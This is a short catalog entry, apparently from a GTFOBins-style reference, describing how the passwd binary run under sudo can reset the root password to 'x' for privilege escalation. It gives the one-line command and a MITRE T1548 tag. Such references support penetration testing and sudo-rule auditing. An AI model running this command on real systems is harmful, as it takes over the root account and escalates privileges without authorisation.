Catalog GTFOBins

GTFO · Tool

passwd

1 technique LinuxGTFOBins GPL-3.0

privilege-escalation

Privilege Escalation Linux

This changes the root password to `x`, so it's now possible to log in using, for example, `su`.

echo -e 'x\nx' | passwd
Context
sudo
Native
privilege-escalation
MITRE
T1548